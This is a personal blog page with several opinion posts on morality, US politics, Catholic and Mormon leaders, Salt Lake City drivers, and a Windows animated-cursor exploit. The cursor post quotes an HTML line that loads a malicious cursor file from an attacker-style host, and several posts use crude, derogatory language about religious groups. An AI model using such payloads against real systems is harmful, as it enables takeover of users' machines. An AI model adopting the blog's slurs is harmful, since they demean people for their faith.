There is no such thing as objective morality

Odd Bits, Political, Religion No Comments »

No matter how you may arrange your morality, whether you think it is from a higher power or by societal constraints alone - there are going to be those who don’t follow that morality or simply don’t believe you.

You will always have the factor of someone deciding that this set of atoms has every right to disassemble that other set of atoms. It does not matter how they are raised or what they are taught, unless you are willing to murder those who do not agree with your “objective” morality, they may wander away from it and in doing so come up with their own version of right and wrong. The foundation of a God inspired morality only holds as long as the belief in that God is intact. Without a belief in that God, the whole moral framework becomes suspect. This does not happen in a morality framework decided upon by men alone, because faith is not involved and the loss of faith cannot affect the moral system.

The atheist morality has more substance, ultimately.

The only objective morality I see in the universe is the law of nature - which is both cruel and kind, vicious and gentle. Eat, breathe, live, defend, kill, die. Everything else is an illusion or construct we’ve assembled via consciousness, giving us our ability to quantify such. You can believe that killing another is utterly wrong, but you’re going to have a damn hard time arguing that with the tiger bearing down on you.

Ultimately, there are no divine rights, for that matter. There is only force. How and why we decide to use that force is determined by societal constraints alone. Any “higher” morality guiding such is simply a mind game. The Bill of Rights is set aside, for example, as a list of inalienable rights. You can claim up and down the fence that these are “God given”, but if the government doesn’t believe in your version of God, you’re screwed. The only way to keep civil rights of any kind is to be willing to use force to keep them. A “right” only exists because the masses are willing to die to keep them. Which is why we have no rights in this country anymore.

All of this, however, does not mean that developing morality has no benefit. There are benefits to preventing anarchy, as a structured and peaceful society will have the means to advance science, art, etc. An anarchy will not be able to have the comfort of doing the same. Forming rules of conduct among a group is necessary to allow each to not only live, but to thrive, since protection from nefarious forces en mass has always worked, because there is simple safety in numbers.

However, having examined societies in general, I believe this starts to fall apart when two things come to pass: overpopulation and rules being made for the simple purpose of having another rule.

When a group becomes too large to be able to know each other as neighbors, you start to lose sight of the damage a new rule or law put into place does to them - it will not affect you personally anymore, because the damage you’ve done will not come back to you in the form of a lost service or lost revenue by any other definition (comfort, food, shelter, aid…) Once you can make the affect of a law be something which happens to “other” people, you have effectively de-humanized a segment of the population and your group morality starts to fail as some feel victimized.

Laws made for the sheer purpose of having another rule, will always cause damage to someone. No thought of consequence occurs in this type of behavior, and if the group is small it will be held in check by others wielding power against the lawmaker run amok. If the population is too large and the lawmakers have managed to distance themselves from the rest, then they become in a sense, untouchable and are propped up as more-than-mortal, of higher consequence than the rest. The lawmakers in turn start to think of everyone outside of other lawmakers as sub-human and you have a snowball rolling down a sharp incline.

I think the Framers understood this dynamic, which is why they wanted a strong local government system in comparison to the federal. Local governments would be in tune with their neighbors, far more than some federal branch ever could be. The federal branch was only to provide the slightest needed cohesion to pull the union of states together under one umbrella of protection from other nations and that’s it.

But once the fed became distanced and empowered as more-than-mortal, it fell apart.

Last gasp for breath, I think

Odd Bits, Political No Comments »

So, what have we seen from the Democrats so far concerning Iraq, Iran and our loss of liberty from the current administration? Nothing. Exactly what I had expected.

Four months of non-binding resolutions and “we support our troops” side-speak to cover the amazing pork flying through the war appropriations bills, does little to make one believe that the course of this country is going to change any. If you voted Democratic in hope that they would fight against the Republican march, you’ve were duped.

To be bluntly honest, I’ve given up all hope that the republic remains.

King George’s grab for power has turned us into a monarchy for all extents and purposes, and the Democratic held congress presents but a pretense of resistance.

Republicans are drag-queen liberals, they talk the talk of classical Jeffersonian Republic philosophy, but embrace the tenants of socialism underneath. The largest expansion of federalization has always, consistently, come from the Republican party. The only difference between the Democratic and Republican goals, are that the Democrats are at least open about their socialist/dictatorial agenda.

When I look at the shit handed to us on a silver platter, paid for with our money and blood, bandied about like it was fine caviar given to us out of the goodness of the government’s heart, I want to cry. Our civil and natural liberties are just so much song and dance now - as nothing is really left of the Bill of Rights. We never stood up for it. Now they are mere privileges which will be yanked away from us if we stir the boat too much or too often.

The Framers of this country went to war for a lot less than the atrocities forced on us, which has also deflated any hope I had that the American Idle are going to actually wake up and do anything. It gets worse and worse and we just beg for more.

“Please sir, may I have another?

In short: we’re screwed - and there’s no turning things around now. The new American Empire will forge ahead, until the Federal Reserve collapses like a cheap balloon and there is no choice left but revolution. It will be bloody and vulgar, as the country which now consumes 40% of the Earth’s resources (while possessing 6% of the population) suddenly becomes just another banana republic, with no clout and no buying power. We are simply a mirror of the last days of Rome.

Well, at least it was an interesting ride getting here.

I love my sweet Jesus

Religion 4 Comments »

If it pisses of Bill Donohue of The Catholic League, then it must be good!

An artist named Cosimo Cavallaro has made a six foot, naked rendering of Jesus out of chocolate to be displayed in Manhattan’s Lab Gallery next week and Billy boy is hopping mad about it.

Heaven forbid a naked Jesus be displayed as any kind of art - after all, he must not have had one of those sinful penises on him in the first place. Come to think of it, Holy Host is round in shape and not too wide - makes you wonder what part of Christ you’re eating at Communion, don’t it?

Donohue is your typical racist, homophobic Christian gas bag, with far more hot air than sense. Some of it is just plain vile. Back in February of this year, this misogynistic ass went so far as to threaten a couple of bloggers for their take on his attacks against John Edwards. Now, the bloggers went out there in their language as well, but aren’t we taught to expect better from good Christians?

His rants are almost unbelievable, like this gem.

I guess you can’t expect much more from a slob who states, “The gay community has yet to apologize to straight people for all the damage that they have done — for contaminating the blood supply in New York City and around the country.”

And you people thought that the Inquisition was done with.

Don’t worry, though…sweet Jesus loves you.

PAWN

Wonderful Things No Comments »

Every once in a while you find an artist out there who actually seems to have some talent. Fredrik K.T. Anderssson fits that bill in my book.

If you have a little time, wander over to the PAWN Site.

Cursors? WTF?

Computers No Comments »

Just when I thought Microsoft couldn’t sink any lower into stupidity, an exploit comes out which works by over-running Window’s animated cursor routine.

You read that right, animated cursors. You know, the little pointer that moves by your mouse.

As it turns out, this is so easy to exploit through Outlook and Internet Explorer, that a Web page or HTML email containing something as simple as:

<BODY style=”CURSOR: url(’http://www.weownyou.com/cursor.ani’)”>

with “cursor.ani” being the malformed animated cursor, is enough to allow their code to completely take over your Windows box, whether it is Windows 98 or Vista. There is no way to turn off the hooks in either program to not load animated cursors, so you’re stuck until Microsoft releases a patch.

I can excuse mistakes in code, as none of us are perfect. When an operating system becomes as large as Windows is, it is nigh impossible to find every bug the first pass through. However, to have a design problem so large that your animated cursor routine allows exploitation of the entire operating system, is beyond belief. How do you fuck up mouse handling routines so badly, that it allows an OS exploit?

What the hell is next? Remote exploits through the file renaming routine?

Morons with Keyboards

Odd Bits 2 Comments »

I’m certainly not the only one making an ass of himself on a blog these days. I figured since a friend and coworker of mine made a link to this mess, it’s only polite to make one back for the whiny little liberal sod. Tofu goodness all around.

Utards Can’t Drive

Asides, Religion 1 Comment »

Well, it’s General Conference time in Salt Lake City again. That means the city is filled with more Mormon drivers as can be found any other time. Some are from out of state, certainly, but considering what I’ve seen in Salt Lake when General Conference is not in session, I mostly blame the Utards.

I’ve traveled all over this country and I can’t think of a single place I’ve been with less talented drivers. The first week I was here, one of these road weaving geniuses decided to make a U-turn without the slightest notice, right in front of me. Sounds tame, actually, until you take into account that I was in the left lane and he was in the right lane of two heading east. Running a red light, mind you. At least he had the wrong turn signal on.

Back to General Conference. If you’re an outsider to Utah, this can best be described as lemmings running to the cliff edge. It should be called General Stampede. I have the unfortunate luck that my wife currently works downtown, so I must cross this no-sane-man’s land daily in our commute. You’ve heard the expression, “If you don’t like my driving, get off the sidewalk!” Here it’s, “If you don’t like my driving, get out of the bathroom!”

Further, the stampede is for a general gang-wanking over the LDS Profit, G. B. Hinckley. Apparently, like the Catholic Pope, he has some special mental phone line to God, that only followers of the religion can make sense of, or believe. General Stampede is the time the Profit is the answering machine, playing back the messages to the masses.

Now before you accuse me of poor spelling, I should relate here that I see nothing prophetic in Hinckley’s veiled sexism and general vagueness. Pro-family, God is love, blah, blah, blah… For a prophet, he doesn’t seem to have a clear phone line.

Back in 2004 he had a interview with Larry King:

KING: What happens when you die?
HINCKLEY: When you die? Well, I’m not fully conversant with that. I haven’t passed through that yet.

Well, shit! That’s damned insightful, eh?

Ah, but there is money to be made. No doubt about that. Like the Catholic Church, the LDS Church sees a lot of currency in the collection plates.

Hence, the Profit Hinckley.